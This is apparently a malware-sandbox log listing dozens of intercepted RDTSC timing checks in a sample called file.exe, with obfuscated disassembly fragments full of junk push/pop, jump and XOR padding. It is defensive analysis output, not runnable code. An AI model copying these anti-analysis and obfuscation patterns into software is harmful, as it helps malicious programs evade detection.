Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0095 second address: 48D009B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D009B second address: 48D009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D009F second address: 48D00A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D00A3 second address: 48D00D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push FFFFFFFEh 0x0000000a jmp 00007FDAD10EAC40h 0x0000000f push 0F283903h 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAD10EAC43h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D00D9 second address: 48D00DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D00DD second address: 48D00E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D00E3 second address: 48D0110 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E34h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 79B2A74Bh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FDAD0CA5E2Ah 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0110 second address: 48D0116 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0116 second address: 48D0127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD0CA5E2Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0127 second address: 48D012B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D012B second address: 48D019A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 6B40C9B4h 0x0000000d pushad 0x0000000e mov di, ax 0x00000011 popad 0x00000012 xor dword ptr [esp], 1DD5E2C4h 0x00000019 jmp 00007FDAD0CA5E2Eh 0x0000001e mov eax, dword ptr fs:[00000000h] 0x00000024 pushad 0x00000025 mov di, 3D90h 0x00000029 popad 0x0000002a push esi 0x0000002b jmp 00007FDAD0CA5E34h 0x00000030 mov dword ptr [esp], eax 0x00000033 pushad 0x00000034 pushfd 0x00000035 jmp 00007FDAD0CA5E2Eh 0x0000003a or cl, 00000008h 0x0000003d jmp 00007FDAD0CA5E2Bh 0x00000042 popfd 0x00000043 push eax 0x00000044 push edx 0x00000045 mov bx, cx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D019A second address: 48D01AA instructions: 0x00000000 rdtsc 0x00000002 mov ch, 04h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 sub esp, 18h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D01AA second address: 48D01AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D01AE second address: 48D01B4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D01B4 second address: 48D01E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FDAD0CA5E2Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FDAD0CA5E2Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D01E9 second address: 48D0228 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FDAD10EAC46h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 jmp 00007FDAD10EAC3Dh 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov edi, esi 0x0000001d mov cl, 17h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0228 second address: 48D0259 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, di 0x00000006 jmp 00007FDAD0CA5E33h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FDAD0CA5E30h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0259 second address: 48D0268 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0268 second address: 48D026E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D026E second address: 48D0272 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0272 second address: 48D0298 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, edi 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FDAD0CA5E2Bh 0x00000014 mov esi, 1EEA709Fh 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0298 second address: 48D02FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDAD10EAC48h 0x00000012 jmp 00007FDAD10EAC45h 0x00000017 popfd 0x00000018 call 00007FDAD10EAC40h 0x0000001d mov ebx, ecx 0x0000001f pop eax 0x00000020 popad 0x00000021 xchg eax, edi 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FDAD10EAC3Fh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D02FB second address: 48D0318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0318 second address: 48D031E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D031E second address: 48D0322 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0322 second address: 48D034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [769B4538h] 0x0000000d pushad 0x0000000e mov edi, ecx 0x00000010 popad 0x00000011 xor dword ptr [ebp-08h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FDAD10EAC44h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D034E second address: 48D035D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D035D second address: 48D039A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, ebp 0x0000000b jmp 00007FDAD10EAC47h 0x00000010 nop 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D039A second address: 48D039E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D039E second address: 48D03A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D03A2 second address: 48D03A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D03A8 second address: 48D03C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAD10EAC3Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D03C7 second address: 48D0403 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b mov cl, 84h 0x0000000d mov di, 4BB4h 0x00000011 popad 0x00000012 lea eax, dword ptr [ebp-10h] 0x00000015 pushad 0x00000016 mov al, dl 0x00000018 mov edi, ecx 0x0000001a popad 0x0000001b mov dword ptr fs:[00000000h], eax 0x00000021 jmp 00007FDAD0CA5E2Ch 0x00000026 mov dword ptr [ebp-18h], esp 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0403 second address: 48D0407 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0407 second address: 48D0424 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D0424 second address: 48D042A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D042A second address: 48D04A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E33h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr fs:[00000018h] 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FDAD0CA5E34h 0x00000018 adc cl, 00000058h 0x0000001b jmp 00007FDAD0CA5E2Bh 0x00000020 popfd 0x00000021 call 00007FDAD0CA5E38h 0x00000026 mov di, cx 0x00000029 pop ecx 0x0000002a popad 0x0000002b mov ecx, dword ptr [eax+00000FDCh] 0x00000031 jmp 00007FDAD0CA5E2Dh 0x00000036 test ecx, ecx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04A6 second address: 48D04AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04AA second address: 48D04BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04BD second address: 48D04ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, DB3Ah 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jns 00007FDAD10EAC6Ah 0x00000012 jmp 00007FDAD10EAC3Dh 0x00000017 add eax, ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDAD10EAC3Dh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04ED second address: 48D04F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04F3 second address: 48D04F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04F7 second address: 48D04FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48D04FB second address: 48D0544 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FDAD10EAC45h 0x00000012 sub cx, 93C6h 0x00000017 jmp 00007FDAD10EAC41h 0x0000001c popfd 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FDAD10EAC3Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C01A1 second address: 48C01F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FDAD0CA5E2Fh 0x00000008 pop eax 0x00000009 call 00007FDAD0CA5E39h 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 mov ecx, edi 0x00000018 mov si, di 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007FDAD0CA5E2Bh 0x00000023 sub esp, 2Ch 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov cx, dx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C01F3 second address: 48C01F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C01F8 second address: 48C0215 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD0CA5E39h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0215 second address: 48C0219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0219 second address: 48C0228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0228 second address: 48C022C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C022C second address: 48C023B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C023B second address: 48C0241 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0241 second address: 48C0245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C02DA second address: 48C0365 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 805Ah 0x00000007 mov ebx, 63134826h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebx, 00000000h 0x00000014 pushad 0x00000015 jmp 00007FDAD10EAC48h 0x0000001a call 00007FDAD10EAC42h 0x0000001f movzx esi, di 0x00000022 pop ebx 0x00000023 popad 0x00000024 sub edi, edi 0x00000026 jmp 00007FDAD10EAC43h 0x0000002b inc ebx 0x0000002c pushad 0x0000002d jmp 00007FDAD10EAC44h 0x00000032 jmp 00007FDAD10EAC42h 0x00000037 popad 0x00000038 test al, al 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushad 0x0000003e popad 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0365 second address: 48C036A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C036A second address: 48C0397 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FDAD10EAE33h 0x0000000f pushad 0x00000010 mov cl, 28h 0x00000012 popad 0x00000013 lea ecx, dword ptr [ebp-14h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0397 second address: 48C039B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C039B second address: 48C03A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03EC second address: 48C03F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03F0 second address: 48C03F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03F4 second address: 48C03FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C03FA second address: 48C0409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0409 second address: 48C040D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C040D second address: 48C0443 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f pushfd 0x00000010 jmp 00007FDAD10EAC3Dh 0x00000015 adc eax, 2A4651D6h 0x0000001b jmp 00007FDAD10EAC41h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C04C4 second address: 48C0551 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop esi 0x00000005 push edx 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FDB42D43DE4h 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FDAD0CA5E2Bh 0x00000017 adc cx, 2BDEh 0x0000001c jmp 00007FDAD0CA5E39h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007FDAD0CA5E30h 0x00000028 sub cl, FFFFFFD8h 0x0000002b jmp 00007FDAD0CA5E2Bh 0x00000030 popfd 0x00000031 popad 0x00000032 js 00007FDAD0CA5E86h 0x00000038 jmp 00007FDAD0CA5E36h 0x0000003d cmp dword ptr [ebp-14h], edi 0x00000040 pushad 0x00000041 call 00007FDAD0CA5E2Eh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0551 second address: 48C0566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov ax, bx 0x00000008 popad 0x00000009 jne 00007FDB43188B77h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0566 second address: 48C056C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C056C second address: 48C0592 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC47h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov bh, 3Eh 0x00000011 mov edi, eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0592 second address: 48C0598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0598 second address: 48C05AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-2Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDAD10EAC3Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C05AF second address: 48C05B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2A2CB704h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C05B9 second address: 48C0625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edx 0x00000008 jmp 00007FDAD10EAC46h 0x0000000d mov dword ptr [esp], esi 0x00000010 jmp 00007FDAD10EAC40h 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov dx, B300h 0x0000001d pushfd 0x0000001e jmp 00007FDAD10EAC49h 0x00000023 add eax, 03B3ED06h 0x00000029 jmp 00007FDAD10EAC41h 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0625 second address: 48C062B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C062B second address: 48C064B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC43h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C064B second address: 48C065D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C065D second address: 48C0675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD10EAC3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ecx, ebx 0x0000000f mov al, bl 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0675 second address: 48C06A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDAD0CA5E39h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FDAD0CA5E2Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06A2 second address: 48C06A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06A7 second address: 48C06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 0DFC8AE0h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FDAD0CA5E35h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06CB second address: 48C06DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDAD10EAC3Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06DB second address: 48C06DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C06DF second address: 48C071F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007FDAD10EAC43h 0x00000012 sub ecx, 11C4071Eh 0x00000018 jmp 00007FDAD10EAC49h 0x0000001d popfd 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C071F second address: 48C0723 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 48C0797 second address: 48C079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
